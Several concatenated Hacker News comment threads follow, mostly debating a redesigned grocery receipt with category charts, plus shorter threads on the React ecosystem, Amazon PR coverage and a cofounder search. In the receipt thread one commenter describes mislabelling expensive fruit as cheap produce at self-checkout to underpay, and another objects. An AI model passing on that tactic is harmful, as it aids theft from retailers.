are some _genuinely_ better ways of doing things (some really are just
different and equally good, and it's fine to ignore those) that have evolved
and been evaluated and ultimately embraced by the community in parallel in the
few short months I've had my head down.
To be honest it's what I love about the JS ecosystem in general - it's an
environment of continual improvement and blisteringly fast pace of change.
~~~
wolco
I too love the constant change its exciting.
But you can't live like that forever. Things need to remain constant so you
can work on difficult business logic instead of changing how you do standard
things.
~~~
davnicwil
The point I was making though is that this isn't necessarily true - you can do
both simultaneously. Your stack _can_ be continually improving while you still
focus on feature delivery in parallel. What I was getting at is that you
should embrace and enjoy this if you want to be happy working in the frontend,
specifically React, world.
------
EugeneOZ
As an "Angular-guy" I can ensure you that with Angular we use also builders,
minifiers and even TypeScript compiler. And testing is a separate story with
painful moments. Of course, we have much more tools out of the box - we don't
have to look for a good router, for example.
But there is no paradise of one magic tool in the web development.
------
hliyan
As a long time React user (four years), I agree with this article for reasons
different from what the author intended, perhaps. That's why I've recently
started learning Dart and hoping that it'll catch on. I want to focus on
solving the problem, not battling the ecosystem...
------
Marazan
This confuses React with the react eco system.
I am a happy producrive React user and I don't know two figs about the wider
eco system.
Whatever man, React is just JavaScript and they've learnt what not to do from
Adobe Flex, that is why I am so fast and productive in it
------
ENGNR
If anything I'd love to see a barebones 'obj => native DOM' library built into
browsers
Let React and others compete over the more advanced use cases like context,
lifecycle methods etc
| {
"pile_set_name": "HackerNews"
} |
Amazon.com: How the Online Giant Hoodwinks the Press - ojbyrne
http://www.slate.com/id/2207537/
======
tl
I don't see any hoodwinking going on here. I do see a vapid piece about the
same press that generally fails on fact-checking and not being a PR mouthpiece
doing what they normally do.
~~~
thinkzig
Agreed. It's a sad commentary on what passes for journalism these days.
Sounds provacative? Run with it.
Facts? Who needs 'em. We've got ads to sell.
Sad.
------
TomOfTTB
I’m going to defend this article. I do think the headline has too much
hyperbole but the point he makes is a good one: Amazon’s PR department made a
claim and papers just ran with that claim sight unseen.
What makes this a bigger issue than simple fact checking is that the claim is
coming from Amazon’s PR department which has every reason to exaggerate and
the claim is unverifiable by the media. So while a normal fact checking error
involves the press not checking out what they believe to be true this
situation involves the press publishing something that is very likely false
and which we know they couldn’t check.
So while it seems like an attack on Amazon (which would be out of line since
their PR is just doing what they’re supposed to) it’s really an attack on
sloppy journalism.
------
mattmcknight
This article is ridiculous. No one is hoodwinking anyone. Amazon is choosing
what to report on very carefully here. They don't want to actually pre-
announce Q4 financials. In any case, from a technical and operations
perspective it is very interesting to know what capacity they are capable of.
(Especially given the number of e-commerce sites that had significant downtime
this year.)
------
sireat
In related news, suit is back this year...
Amazon's PR here is not particularly insidious, what you see/read in Mass
Media is PR roughly 80 percent of the time (some MM such as The Economist
excepted).
------
AndrewWarner
This is by I think we need to be careful when we're studying success. Much of
what people claim is PR.
------
sabat
Amazon PR learned a lot from the Bush administration (K.R.) about how to fool
them. State things as though they're established facts. Typical lazy editors
won't insist that the facts are checked.
~~~
jerf
That's not "learned from the Bush administration", that's PR 101. Go read pg's
essay on PR, which is only news because it's being explained to people not in
the PR industry, not because it was actually new information:
<http://www.paulgraham.com/submarine.html>
The press hasn't been in the business of checking facts for at least two
decades, and it just gets worse and worse.
~~~
sabat
Please, don't try to tell me that KR didn't take it to new heights (and new
levels of cynicism).
| {
"pile_set_name": "HackerNews"
} |
The humble receipt gets a redesign - colinprince
https://www.fastcompany.com/90347782/the-humble-receipt-gets-a-brilliant-redesign
======
rchaud
Struggling to understand the use case for this. I stare at my grocery receipts
like everyone else, but it's to verify the prices I bought them at; sometimes
I pick up an item that I think is marked on sale, when it's actually the
adjacent item that's been discounted. As a whole, the bubble chart doesn't
tell me anything. Meat costs more than an equivalent amount of fruit. Unless
you're looking to go vegetarian for financial reasons, you're not going to
learn much from that chart.
Splitting up items into a taxonomy is somewhat useful, but not when it only
exists on a printed receipt that will go into the trash. It's also not that
useful if you make multiple trips a week, as single people often do.
Finally, it's not useful at all if the categories are based on the company's
SKU/ERP nomenclature, as opposed to a human-centric approach. If one brand of
Ice Cream appears under "Eggs & Dairy" but another under
"Confectionery/Bakery" what value do you get by having that itemized on a
receipt?
~~~
schmookeeg
I like it more than the old fashioned receipt it seeks to replace. I would
look at it and it would bring me a small, fleeting bit of joy.
I prefer no receipts at all, but that doesn't seem to be a universal option.
So if I'm going to get the paper receipt anyway, may as well have some
pleasing design applied to it, and a thought-provoking categorization for me
to reflect upon before I crumple and toss the thing. Beats the pants off of
the old version.
If I was reading a business plan and being asked to invest, yeah, I'd respond
to it your way too. As a "thing that could exist", though, I appreciate it.
~~~
rchaud
I just don't think groceries are the right market for this. For "joy", the
differentiator has to be in-person customer service, because grocery margins
are razor-thin, and the last thing any exec wants to propose is to modify the
ERP (there be dragons) so it generates the clean data that's required for
visualizations.
At my store, they are pushing to reduce checkout staff by "encouraging"
customers to use self-checkout. It hasn't been going well, but this is a
retail-wide trend, and cost-cutting pressures are immense.
Again, because this is so data-centric, the visualizations will generate
errors and miscategorizations that will confuse customers more than if they
had ye olde dot matrix printed receipt.
~~~
JetSpiegel
> At my store, they are pushing to reduce checkout staff by "encouraging"
> customers to use self-checkout. It hasn't been going well, but this is a
> retail-wide trend, and cost-cutting pressures are immense.
This infuriates me so much, I started to see if I could game the system. Fruit
is the easy part, you fill your bag with the expensive fruit, and select
apples or something cheap on the checkout scale. Works better on larger
stores, the minimum wage person overseeing 6 self-checkout machines can't
watch everything, maybe half the people need help, or the scale borks for some
reason.
My local supermarket replaced pre-packaged bread bags, weighted by the
employees with a complete alacarte system which is complete shitshow. You pick
the bread on one place, do your entire shopping and then have to remember what
kind of SKU have you chosen. It's a complete waste of time for everyone, and
I'm pretty sure the surrounding traditional bakeries won here, the bread
selection has lowered substantially on the supermarket.
~~~
luckman212
So you're "infuriated" that retail stores have to cut staff in order to
survive, yet in the next breath you boast about how simple it is to steal from
the store? I see you also didn't forget to belittle the hapless "minimum wage
person" who you're purporting to care about.
~~~
JetSpiegel
> yet in the next breath you boast about how simple it is to steal from the
> store?
> I see you also didn't forget to belittle the hapless "minimum wage person"
> who you're purporting to care about.
That's my point. The employees are valuable, even in a pure profit-driven
analysis.
> retail stores have to cut staff in order to survive
This is completely false, "surviving" is not the word to describe retailers.
------
neogodless
Here's my opinion:
What she got right
\- see items within categories from most expensive category to least, each
category showing a percent of your total grocery bill
\- see relative price within a category at a glance (even if you buy wine,
that's within your alcohol category, so it won't mess up the relative pricing
of your dairy or snacks)
What might not go so well
\- the bubble chart is less universal and intuitive (and it's "quirky")
\- does volume (of what's printed) matter for thermal printing costs?
\- would waiting to print the receipt at the end cause a big slowdown vs
printing as you ring items up? (I believe with most current systems, items can
be added and removed, and they show up as 'add' and 'remove' line items,
because it does print as you scan.)
Many people mentioned digital/CSV breakdowns. I know Home Depot quietly
connected my credit card to my email address after asking me if I wanted a
digital receipt, and I typed in an email. So this seems like a reasonable
option, for anyone that grants permission. (Home Depot annoys me because I say
"Yeah! E-mail me!" and then they hand me a receipt anyway. Ungh!)
~~~
octocode
The print volume matters. These new receipts would be at least 3x longer than
they need to be, and thermal paper:
a) costs money
b) is considered to be highly toxic
c) often isn't accepted by local recycling programs (but people still throw
receipts in anyway)
d) ultimately end up in the garbage, or even just littering street corners.
~~~
erdo
> 3x longer
I used to work for a large payment processing company that supplied POS
systems to retailers, I was surprised to find that receipt length does matter
a lot to some retailers.
The department that shipped till rolls liked long receipts, it made enough of
a financial difference to them to matter.
The retailers hated long receipts, because obviously that meant they needed to
buy more till rolls.
(It's worth remembering that the customers for most POS solutions are
retailers, not the person who buys something in a shop)
~~~
adventured
> The retailers hated long receipts, because obviously that meant they needed
> to buy more till rolls.
Changing out the printer roll is very annoying as well, for a retailer's
cashiers. It's slightly time consuming and it doesn't always go smoothly. It
inevitably results in a customer having to wait longer, slowing the checkout
process further. The less often that action is needed to be performed, the
better.
------
gumby
What's the incentive for a shop to provide this info? From their PoV they
provide it in the itemizations. You can do with that what you will.
It's in the shop's interest to use an antipattern that _obscures_ detail so
you don't reflect on where your money is going, and possibly choose to spend
less.
~~~
iddan
The company interest is also to give customers value
~~~
firethief
Value as judged by the customers, not rational actors. Useful as this is,
drawing more focus to costs would drive customers to shop elsewhere. A version
of this I could see shops actually implementing would be a graph of the
"savings" per-item, a metric which is essentially meaningless but gives people
savvy feelings.
~~~
IggleSniggle
I disagree. I would prefer to shop at a place that showed me this. It would
increase my loyalty to that grocer. The downside to the grocer is that I might
be less inclined to buy meat, but maybe that still works because I instead
gravitate to expensive veg options and look at my percent spend and celebrate
my good decision making.
The only way this would drive me to use a different grocery is if it did a
price comparison vs other grocers and I discovered I was getting screwed...but
even then, if it was marginal, I’m not sure I would change grocer.
Edit: currently, as a shopper, you are most likely to just look at the bottom
line. I think you are right that grocer adoption would be complicated from a
business decision perspective, but I think implementation of this would hit
“brand names” more than anyone else. It’s in both the grocers and shoppers
best interest.
~~~
firethief
I never said _no one_ would like it, so your counterexample isn't a basis to
disagree unless you think most people are as rational as you [think you are]
in the checkout line (they aren't).
Besides, our own assessments of our preferences are notoriously inaccurate. It
would be _logical_ for you to like it, but I'll believe you actually do when
you make choices reflecting the preference. Which you'll never have a chance
to do unless some store's marketing department thinks this is a good idea.
~~~
IggleSniggle
You are right, I am disagreeing on the basis of speculation based on my own
experiences and preferences. I assumed you were making an argument from the
same place? That said, you are right, we will likely never have the
opportunity to test this particular preference.
So, from the place of my personal experience: I am sucker like everyone else,
and prefer stores that tell me a per-unit price that I can compare like-to-
like brands, often to the point of irrationality. I will also grant that I
could have a backlash on this if it makes the receipts unduly long, which is a
reason for me to prefer RiteAid over CVS. Plenty of reasons not to like this.
I just don't _personally_ believe that drawing attention to price would be a
reason for me to stop shopping at a place, although it would (hopefully) alter
my buying habits within said store.
~~~
firethief
> You are right, I am disagreeing on the basis of speculation based on my own
> experiences and preferences. I assumed you were making an argument from the
> same place?
Actually, no. I too think I have logical preferences and would prefer the
additional information--but I don't think typical shoppers would respond well
to it, possibly including myself (because I don't know if I would act in
accordance with my estimation of my hypothetical preferences). So I'm making
my argument from psychological principles, and in particular by inferring what
supermarkets know about the psychology of typical shoppers (because I'm not an
expert, but I assume the people the big supermarkets consult to stay
competitive are the best in the field).
> So, from the place of my personal experience: I am sucker like everyone
> else, and prefer stores that tell me a per-unit price that I can compare
> like-to-like brands, often to the point of irrationality.
If that's what people actually want, stores have no idea what they're doing.
The supermarket where I usually shop uses different units for the "unit
prices" of different brands, so if I want to compare unit prices I have to do
the math myself. The information they highlight tends to be the "sales", which
serve to: convey a feeling of beating the system (even when they're so common,
taking the sale obviously just means not paying the sucker price); and
constantly invalidate all previous price comparisons for commodities like
coffee where in-depth price comparison would otherwise make sense.
> I just don't _personally_ believe that drawing attention to price would be a
> reason for me to stop shopping at a place, although it would (hopefully)
> alter my buying habits within said store.
I wouldn't expect anyone would think they'd be unhappy to have the additional
information, because people consistently assume their behavior is logical. Ha.
------
MatekCopatek
This might be a local thing, but in my experience shops work hard to obfuscate
the receipts as much as possible. If they're competing on price, their tactic
is usually to promote a few random products they have the best price on and
then hope you'll pick their store to buy all your groceries. For that reason,
they are absolutely against giving you raw data, because that would allow you
to make a shopping list and find the store with the best total price.
I remember some people tried to do an app that would let you scan receipts and
make comparisons, but they gave up. Even stores from the same huge chain would
have different prices for the same item and a different name on the printed
receipt as well. I don't want to get into conspiracy theory territory, but it
looked very deliberate.
Eastern Europe here BTW.
~~~
behringer
My thoughts exactly? Why would any store ever want this? It's completely
against their interests. They want to sell high priced/high margin items. They
don't want customers shamed into spending less on bakery and alcohol and other
non-essentials.
Likewise customers might feel alienated seeing how much data they're giving to
the store and feeling bad for spending 20 percent of their meat budget on a
rib eye.
If you want to follow this closely your food buying habits, get an app. I
think it'd be weird to have this receipt. I mean I'd have to shred the thing
before I'd even be comfortable throwing it away!
~~~
henrikeh
For what it is worth, Føtex, one of the largest supermarket chains in Denmark
prints the receipt with the items ordered in categories.
------
myth_buster
I'm surprised by the reception this is getting.
I may be wrong here, but my approach to this would be completely counter to
the one taken. Instead of overhauling POS systems (which are painful/tedious
to do), I would try to build an OCR app that reads the items and does all that
viz in the app, saving some paper and ink in the process.
In addition to above constraint with POS systems, I don't have one stop shop
for getting all items in one category (say groceries).
~~~
mnort9
Your solution may be the better product, but info on receipt has 100% user
adoption compared to the extreme minority that will put in the extra work to
download the app, scan the receipt, etc. Distribution is the big win here.
~~~
weberc2
If you overhaul the system to provide those data via an API (instead of OCR-
ing receipts or printing these relatively useless visualizations), then not
only could DIY folks like the parent and myself do the analyses ourselves, but
any number of personal finance tools could also support the system to make it
easy for their customers to visualize their own data.
------
guelo
I was hoping was this about removing the toxic chemicals from thermal printer
paper used for receipts. I refuse to touch that stuff and I warn cashiers that
they should wash their hands often.
~~~
rsl7
So you're that person. I love it. keep it up.
------
noer
I don't understand how a bubble chart based on percentage of the total from
various departments fixes receipts? Knowing the percentage of my total that
comes from a specific department isn't a problem I have, though maybe it is
for others. I'd be more interested in being able to self categorize my
purchases and breaking down the percentage that way.
------
thiscatis
I rather have them digitally. Also, can we leave it with the "just did x"
titles.
~~~
smn1234
how do you contest wrong quantity scanned, while in person? Less effective to
seek reimbursement to do so after leaving the shop.
Are you suggesting an app that is connected to register that shows the
scanning activity live, and somehow retaining that entirely in digital copy??
~~~
mijamo
If you pay by card it could just be handled by Visa for instance. That would
be neat.
And it doesn't mean you wouldn't be able to get a paper copy in addition if
you want.
------
philpowell
I usually like fresh takes on traditional, utilitarian design. But this has
left me cold. For two main reasons:
1\. This is trying to fix a problem which doesn't exist for 99% of people. A
family struggling to figure out the math of feeding their kids with ~$0 will
not recognise "mindful" shopping.
2\. There are much better problems to solve in retail. Store design is
confrontational and manipulative. Fix that first. Then fix packaging and
presentation so that we all understand a bit more about what we're buying and
how we can cook stuff. Then create meal deals which match ingredients, rather
than pre-packs.
But I think the main reason this idea felt like the lowest of low-hanging
fruit, is this: I'm severely sight impaired, and, on ocassion, I still get
shouted at by staff when I can't negotiate an automated checkout easily, or I
don't understand a chocolate-pimping deal they are pushing at checkout.
Customer service is focused on "service", not "customers". Fix that first,
then create pretty reciept graphs.
------
sametmax
Love it.
It's missing a qrcode with a date, uuid, total, tax and unguessable url to the
items list and prices (or gzipped json of it) so that we can finally scan
import receipts with software.
Qr codes should be mandatory on most paper docs IMO. Forms, invoices,
contracts, etc.
~~~
fwip
You'd like to mandate that all stores keep a permanent record of every
purchase ever made?
~~~
anoncake
No need for that.
30 bits to represent the 13 digit IAN.
3 bytes for prices up to 167772.16. If you frequently buy things more
expensive than that, just have one of your servants transcribe the recipe to
your favorite format.
1 byte for the number of items. If you buy more than 255 of one thing, we'll
just add another line to the recipe.
That's 60 bits per line item. A QR code holds up to 23,648 bits. That makes up
to 394 line items per QR code, without compression, which ought to be enough
for anyone.
If you do buy more than that, the POS crashes^H prints another QR code.
~~~
uponcoffee
>3 bytes for prices up to 167772.16. If you frequently buy things more
expensive than that, just have one of your servants transcribe the recipe to
your favorite format.
>1 byte for the number of items. If you buy more than 255 of one thing, we'll
just add another line to the recipe.
You could split prices greater than 167772.16 into chunks, delimited by using
zero for the number of items in the subseqent line items.
~~~
anoncake
I think it's simpler to make the field variable length. The same is necessary
for the count field, buying >= 256 grams of something is common.
------
the_arun
Instead, what if receipts just include a QR code to a web page giving all
kinds of details? customer could save or integrate with their personal
financial management service.
~~~
niteshade
My thoughts exactly, this approach helps with the issue of anonymous purchases
(i.e. retailers linking payments with email addresses[0]) although presumably
retailers will try and make up for it by shoving analytics on the receipt
display page, though that can also be disabled with an adblocker.
[0]:
[https://www.theguardian.com/travel/shortcuts/2016/oct/16/sho...](https://www.theguardian.com/travel/shortcuts/2016/oct/16/shops-
sign-up-e-receipts-proof-of-purchase)
------
dugluak
Receipt should be just data. Mixing analytics in it seems to be overkill.
Making it easy to feed the data to a separate analytics app seems to be a
better idea so that consumers can analyze their spending not only for that
particular instance of purchase but also over a period of time.
------
psukhedelos
Good on Susie! There's something really cool and fun about integrating data
visualisation into an old school receipt.
My question is, what prevents itemisation in bank statements directly?
I have always wanted for my itemised purchases to show up directly in my bank
account (instead of just the total). From there, I could see how much I am
spending by either automatically generated or manually defined categories. One
step further would allow me to budget my money not into separate accounts but
by category (think sub-folders within your accounts). You can define the
limits of a category and transactions are declined when you've hit your budget
and attempt a purchase of that category / product type.
Is there any argument to be made for the bank not having access to the
individual purchases (e.g. privacy concerns, too much data)?
Are account holders with a grasp and control of their money and spending not
more beneficial to a bank / businesses (not an expert, so forgive me if this
is a bit naive)?
I think some third party apps attempt to solve this, but as far as I'm aware
they are more of a view of your accounts and not able to control transactions
/ spending limits. Personally I'd also rather not give my buying information
to another entity.
~~~
JohnFen
> I have always wanted for my itemised purchases to show up directly in my
> bank account (instead of just the total).
I 100% do not want this, ever, period.
~~~
pbhjpbhj
Why not?
~~~
ColinWright
See the sibling comment in this thread:
[https://news.ycombinator.com/item?id=19903991](https://news.ycombinator.com/item?id=19903991)
> _I can 't get my head around the fact that you are actually suggesting this.
> Do you want your bank to know that you buy 30-40 bottles of beer each week?
> Do you want them to know that you buy medicine for a terminal disease during
> your visit to discuss a family home loan?_
~~~
pbhjpbhj
Seems like the store could use your public key to encrypt the data it uploads
to your bank, they get the full data, you decrypt it. It's then just using the
current channels.
But, I imagine it's easier to have the store make a temporary xml/json file on
their servers, give you the QR code to access it, then you can control the
data flow from then.
------
Theodores
I have wondered before why it is that you can't buy groceries with a
'compelling receipt' that shows you other database fields. Everything has
calories/sugar/salt/fat etc. in a per 100g form (measurements are different in
USA). So you could checkout some online shopping and see how many calories you
are getting for your money.
If you wanted to improve your shopping you could see what was being wasted on
'empty calories' and remove it from the order. Just being to sort the checkout
by 'most salt/100g' would be interesting to me and plenty of people who do
diets.
However, this would not help most people to click the 'buy now' button.
So it is for this reason this receipt idea has to go. Receipts only really
have to be read by people who do tax expense forms. Fancy receipts have been
possible for years now - you could have a full colour receipt with pictures of
everything, all fonts 'on brand', as fancy as it gets. But no retailer has
decided to do this, there is something for the receipt we know being the
throwaway thing it is.
------
sccxy
My self-service supermarket kiosk has option for "no receipt".
I register with my bonus card and can look all my receipts online.
No need to waste paper. It is 2019 after all.
------
robohamburger
A QR code or something similar I could scan and get the receipt in csv would
fix receipts for me.
~~~
Nerada
Exactly what I want out of a receipt. Exactly.
Just a QR code that translates to a csv of items and their costs.
------
joezydeco
I don't quite get the bargraph. So it's charting the price of everything
relative to the most expensive item in the ticket?
What happens if I buy a $100 bottle of wine and the rest is small priced
cheeses and vegetables for a party? It becomes useless.
~~~
arkades
> What happens if I buy a $100 bottle of wine and the rest is small priced
> cheeses and vegetables for a party? It becomes useless.
Do you find this an everyday event?
~~~
joezydeco
No, just an outlier example. A way to show that graphing things like this
would make Tufte's teeth grind.
------
stedaniels
Flux [0] in the UK are currently trying to irradiate the paper receipt. It's
integrated with Monzo bank too. IIRC there's an API to do whatever you like
with the data. I imagine Monzo will start doing cool data visitations to help
your spending habits.
[0] [https://www.tryflux.com/](https://www.tryflux.com/)
~~~
fwip
Irradiate?
~~~
bloopernova
eradicate
------
weberc2
I would be content if there was an easy way to get the raw itemization info so
I could load it into any system I want to do any analysis I want. Instead of
breakdowns per trip I could get breakdowns per month or per annum. I could
also choose from a variety of visualizations instead of being beholden to
whatever is printed on the receipt.
------
cyberferret
This reminds me of a design competition a few years ago that I saw in a
magazine, where prominent designers were hired to redesign the simple, common,
every day invoice layout.
The results were a hideous, arty, mess that almost every business surveyed
with the samples said were unreadable and would increase the workload on their
accounts staff. All they wanted was a simple layout with the invoice number
and date somewhere on the top right, then the total amount and the tax
breakdown somewhere on the bottom right.
That facilitated data entry into their own accounting system for later
processing. If they wanted to query a specific thing on the invoice, that was
a secondary consideration, but even then, they wanted things laid out simply
so they could find the line item, see the price (and quantity) and the line
total. That was it. Something the common, every day invoice layout does well
today.
The problems I have with this concept (and this comes from over 20 years of
installing Point of Sale systems), is that a lot of POS systems these days
still print the receipt items as they are scanned (to save time, I guess). So
having the bubble chart at the top would be impossible as you don't have all
that data until the entire transaction is finished.
Also, when the customer gets this receipt, the transaction is over. This is
after the fact. It is really hard to 'undo' anything, and any learning about
spending patterns will be forgotten by the time they next do a shopping run in
a few days.
Another thing - I frequently have blow outs in my shopping, but that is
usually when I tend to treat myself to a special item, or perhaps purchase a
new frying pan etc. as part of my normal food shopping. This would result in a
large bubble or bar on my receipt, whilst negating other more important things
to a much smaller scale.
For example, last week my fresh veg bar looked like: [======....] but today it
looks like [==.......] next to my very expensive tub of foie gras that I
impulsively purchased as a treat or for a party. I may have bought the same
_quantity_ of vegetables, but visually it looks like I really skimped on them
this time around.
I applaud designers such as this OP who try and push the traditional
boundaries and expectations, but sometimes, a little more real world
experience and application would save everyone a lot of time. This is akin to
a non-pilot enthusiastically putting forward and promoting that circular
runway idea from a couple of years ago.
------
barking
When i find a receipt the first thing I often wish to know is when it is
dated, so if it's old I can just dump it. It can be really frustrating as it
can be anywhere on tiny piece of paper. There should be a receipts standard
that all should have to comply with so everything is always in same place.
~~~
frosted-flakes
Anywhere, and in one of a dozen formats.
------
dugluak
The only utility of a receipt for me is just so that I can make returns.
Otherwise I simply trash them.
------
brucetribbensee
But don't touch the paper!
[https://www.plasticpollutioncoalition.org/pft/2016/12/23/is-...](https://www.plasticpollutioncoalition.org/pft/2016/12/23/is-
bpa-on-thermal-paper-a-health-hazard)
------
djmobley
Looks like a lot of ink wasted on a visualisation which is of limited benefit
to the consumer, and likely to result in lost revenue for the retailer, as
people become more aware of how much they are spending on particular product
categories.
~~~
narrowtux
Thermal paper does not use ink, nothing would be wasted even if printing 100%
black.
~~~
NeonVice
A waste of ink, no, but somewhat a waste of thermal paper.
~~~
post_break
If we're going to talk about wasting thermal paper CVS should be the company
we're going after.
------
Doubl
Thermal printers are the ones where the text becomes invisible over time I
believe. They should be outlawed as a way of providing anything of record. My
credit union gives them as their way of giving you your statement.
~~~
jjtheblunt
there are other papers from as recent as the early 1990s which were used for
receipts, in the US anyway, which also fade.
------
vitiell0
Interesting seeing so many people asking for digital receipt data.
Cooklist lets you connect your loyalty cards and automatically download all
your past and future purchases into one place. (like Mint.com for grocery)
You can see aggregations of all your grocery spending across retailers plus
see recipe ideas to cook with the groceries you bought.
We've thought about introducing more advanced visualization of grocery
spending or an export tool if anyone is interested.
Disclaimer: I'm a cofounder at [https://cooklist.co](https://cooklist.co)
------
m463
What people don't get is:
receipts are not for customers.
They prevent a crooked cashier from pretending to ring something up and
pocketing the cash.
Ever seen those signs? "If you didn't get a receipt, your meal is free"
~~~
JohnFen
> They prevent a crooked cashier from pretending to ring something up and
> pocketing the cash.
How?
A receipt would only be useful for that if the customer diligently looks for
an omission. I'll bet that rarely happens. What seems more likely is that the
customer will notice that they were charged more than what the total on the
receipt said, and will demand that the store refund the "extra charge".
~~~
m463
I meant everything you just purchased, not a line item (although that's a
clever variation but you might still be caught)
The idea is that there's a history of the transaction in the register to get
the receipt (so it happened), and it was handed to someone and they might read
it.
~~~
JohnFen
I still don't understand how a receipt helps for this use case. Can you
explain in a bit more detail?
------
ortusdux
I feel a better solution would be a QR code at the bottom that combines each
product's UPC and price with the name of the store, date, etc. From there it
would be easy to feed that into an app. Whomever created the app could fund it
by selling the consumer spending habit data. They could incentivise the app's
use by providing analytics, directing consumers to cheaper alternatives and
integrating coupons.
~~~
rtkwe
It'll have to be a link to a webpage/API. Thermal printers won't get you good
enough resolution to put that much in a QR code for anything but a very small
purchase with only a few items.
------
dragonwriter
The visualizations aren't particularly useful, and it creates a longer and
thereby slower to scan receipt. Overall, it's a negative to me.
------
rhizome
Receipt designs from an employee of a company that does not create receipts, I
can't think of better evidence of boredom.
The most helpful receipt redesign is already here at Raley's: print on both
sides of the paper.
[https://www.raleys.com/news/raleys-register-receipts-go-
doub...](https://www.raleys.com/news/raleys-register-receipts-go-double-
sided/)
------
hapidjus
Were I do most of my grocery shopping they send me the receipts to my email. I
guess you could make a third party service to better visualize them. Any
suggestions for other improvements or companies that already has great
receipts?
I know there are services that can connect to your bank and categorize your
purchases but it would be great to have a finer granularity. Perhaps you could
just forward all receipt emails.
------
octocode
Adding these black bars and bubble charts makes the receipt three times longer
than it needs to be. Printing millions of these a year would be a huge waste
for something that hardly anyone would look at. The side-by-side picture in
this article has the "new" receipt cropped off at the bottom, showing only
_half_ of the things that were purchased on the same amount of paper. Add all
of the pricing information, addresses, etc. and that full receipt would be
insanely long.
Receipt paper is already an environmental nightmare. Let's not add more of it.
~~~
dugluak
I certainly don't want them on my CVS receipts.
------
ErikAugust
I came for a QR code that scanned to some new open standard for receipts.
Instead, I am disappointed.
------
krustyburger
I would love to see this design adopted by major retailers. If that were to
happen, could Ms. Lu receive any compensation for her contribution? I gather
that the profit motive was far from her mind but this idea could still turn
out to be a major contribution to commerce.
------
blululu
This is great. We should use this. Listing items in order of cost alone is a
win. The bar plot is a nice touch. The category breakdown is also nice (minus
he bubble plot). I feel like this would help people budget and reduce waste.
------
mfatica
This is a solution to a non-existent problem, and not even a good one.
~~~
zwieback
Disagree, I look at my grocery shopping receipt every time to look where I
spent more than expected and I love the look of this, would even pay a couple
pennies extra to have it.
------
DanBC
This is brilliant, and I hope it gets taken up by some companies.
Sadly, I think some of them are going to look at total printing time, and
they're not going to accept longer print times.
------
jeffchien
I like some of the concepts, but in general this just seems to take more paper
(and the side-by-side photo is mildly deceptive by not showing that).
------
purplezooey
Would be nice if they also didn't print them with thermal transfer ink, which
is really bad for you when it gets on your hands (BPA).
------
JohnFen
That's a really interesting idea. I have to admit, though, that I doubt it
would make the receipt any more useful to me.
------
plantain
Why do receipts exist? Why aren't they emailed to the address attached to my
card?
~~~
JohnFen
> Why aren't they emailed to the address attached to my card?
I don't know how many people are like me, but no retailer has my email
address, and I don't use affinity cards.
------
adamwong246
I sure wish there was an app, or banking service, that automatically collects
receipts.
------
Hamuko
Where's the tax info? Has this designer ever met an accountant?
------
Sevii
Square please send me an itemized email receipt.
------
jheriko
this looks expensive.
a good design would be cheaper and make better use of the space - not waste it
------
zwieback
I love it and want it!
------
vbuwivbiu
are they BPA-free ?
| {
"pile_set_name": "HackerNews"
} |
Ask HN: Can you help me find a cofounder? - mwerty
http://www.codemug.com/hn.html
======
mrtron
Ask HN: Can you help me find a wife?
Really - a cofounder is a tight relationship that is tough to find. I wouldn't
jump into bed with a stranger :)
~~~
mwerty
Like I said, I exhausted my personal networks. Think of it as match.com when
all else fails.
Thought I'd add: I currently have two options - continue executing on an idea
by myself and hope I'll find someone soon (as a result of the execution) or
find someone first and then execute. Which would you pick?
~~~
ivey
Someone should actually make a cofounder match site.
~~~
vaksel
I'm pretty sure one exists already. I remember someone posting a link on HN to
it.
------
vaksel
You should probably be more specific in who you are looking for. Because right
now, it looks like you are looking for someone with a pulse.
At least point out some of the skills you are looking for or state if you are
looking for someone who can code or someone who is a "business guy with an
idea"
~~~
mwerty
Good point. I'm changing it now.
------
larrykubin
You graduated from UT-Austin the same year I did, but I got my degree in
Electrical Engineering. I'm still in Austin though and it sounds like you live
in Seattle.
| {
"pile_set_name": "HackerNews"
} |
Subsets and Splits